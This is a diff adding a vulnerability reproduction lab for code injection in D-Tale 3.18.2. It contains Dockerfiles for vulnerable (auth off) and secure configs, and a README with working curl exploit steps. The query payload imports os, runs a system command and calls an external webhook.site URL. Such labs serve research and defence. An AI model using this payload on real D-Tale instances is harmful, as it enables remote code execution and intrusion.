D-tale query method code injection

dtale/exposed_ui/README.md

@@ -0,0 +1,28 @@
+# Setup a D-Tale instance without needing of authentication(insecure)
+```bash
+cd vulnerable_dtale
+docker build -t dtale-expose-ui .
+docker run --rm --name dtale-vulnerable -p 40000:40000 dtale-expose-ui
+```
+# Setup a D-Tale instance with authentication enabled (secure)
+```bash
+cd secure_dtale
+docker build -t dtale-secure .
+docker run --rm --name dtale-secure -p 40000:40000 dtale-secure
+```
+Now use the following command to exploit the vulnerability
+```bash
+# upload sample data
+curl -i 'http://127.0.0.1:40000/dtale/upload' \
+  -X POST \
+  -H 'Content-Type: multipart/form-data; boundary=-' \
+  --data-binary \
+  $'---\nContent-Disposition: form-data; name="data.csv"; filename="data.csv"\nContent-Type: text/csv\n\ntest,data\n\n---\nContent-Disposition: form-data; name="header"\n\ntrue\n---\nContent-Disposition: form-data; name="separatorType"\n\ncomma\n---\nContent-Disposition: form-data; name="separator"\n\n-----\n'
+    # response: 200 OK, body: {"data_id":"a number","success":true}
+
+# replace https://webhook with your webhook URL
+curl -i -G \
+  --data-urlencode 'query=@pd.core.frame.com.builtins.__import__("os").system("""curl https://webhook.site/ #""")' \
+  'http://127.0.0.1:40000/dtale/chart-data/1'
+# response: 200 OK, body: {"error":"'Series' object has no attribute 'columns....
+```

dtale/exposed_ui/secure_dtale/Dockerfile

@@ -0,0 +1,11 @@
+FROM python:3.10
+
+WORKDIR /app
+
+RUN pip install dtale==3.18.2
+RUN pip install dash_daq==0.5.0
+
+COPY config.ini /config.ini
+
+EXPOSE 40000
+CMD ["bash", "-c", "DTALE_CONFIG=/config.ini dtale --host 0.0.0.0 --port 40000"]

dtale/exposed_ui/secure_dtale/config.ini

@@ -0,0 +1,46 @@
+
+[app]
+theme = light
+github_fork = False
+hide_shutdown = False
+pin_menu = False
+language = en
+max_column_width = 100
+main_title = My App
+main_title_font = Arial
+query_engine = python
+hide_header_editor = False
+lock_header_menu = False
+hide_header_menu = False
+hide_main_menu = False
+hide_column_menus = False
+enable_custom_filters = True
+enable_web_uploads = True
+
+[charts]
+scatter_points = 15000
+3d_points = 40000
+
+[show]
+host = localhost
+port = 8080
+reaper_on = True
+open_browser = False
+ignore_duplicate = True
+allow_cell_edits = True
+inplace = False
+drop_index = False
+precision = 6
+show_columns = a,b
+hide_columns = c
+column_formats = {"a": {"fmt": {"html": true}}}
+sort = a|ASC
+locked = a,b
+column_edit_options = {"a": ["foo", "bar", "baz"]}
+auto_hide_empty_columns = False
+highlight_filter = False
+
+[auth]
+active = True
+username = admin
+password = admin

dtale/exposed_ui/vulnerable_dtale/Dockerfile

@@ -0,0 +1,11 @@
+FROM python:3.10
+
+WORKDIR /app
+
+RUN pip install dtale==3.18.2
+RUN pip install dash_daq==0.5.0
+
+COPY config.ini /config.ini
+
+EXPOSE 40000
+CMD ["bash", "-c", "DTALE_CONFIG=/config.ini dtale --host 0.0.0.0 --port 40000"]

dtale/exposed_ui/vulnerable_dtale/config.ini

@@ -0,0 +1,46 @@
+
+[app]
+theme = light
+github_fork = False
+hide_shutdown = False
+pin_menu = False
+language = en
+max_column_width = 100
+main_title = My App
+main_title_font = Arial
+query_engine = python
+hide_header_editor = False
+lock_header_menu = False
+hide_header_menu = False
+hide_main_menu = False
+hide_column_menus = False
+enable_custom_filters = True
+enable_web_uploads = True
+
+[charts]
+scatter_points = 15000
+3d_points = 40000
+
+[show]
+host = localhost
+port = 8080
+reaper_on = True
+open_browser = False
+ignore_duplicate = True
+allow_cell_edits = True
+inplace = False
+drop_index = False
+precision = 6
+show_columns = a,b
+hide_columns = c
+column_formats = {"a": {"fmt": {"html": true}}}
+sort = a|ASC
+locked = a,b
+column_edit_options = {"a": ["foo", "bar", "baz"]}
+auto_hide_empty_columns = False
+highlight_filter = False
+
+[auth]
+active = False
+username = admin
+password = admin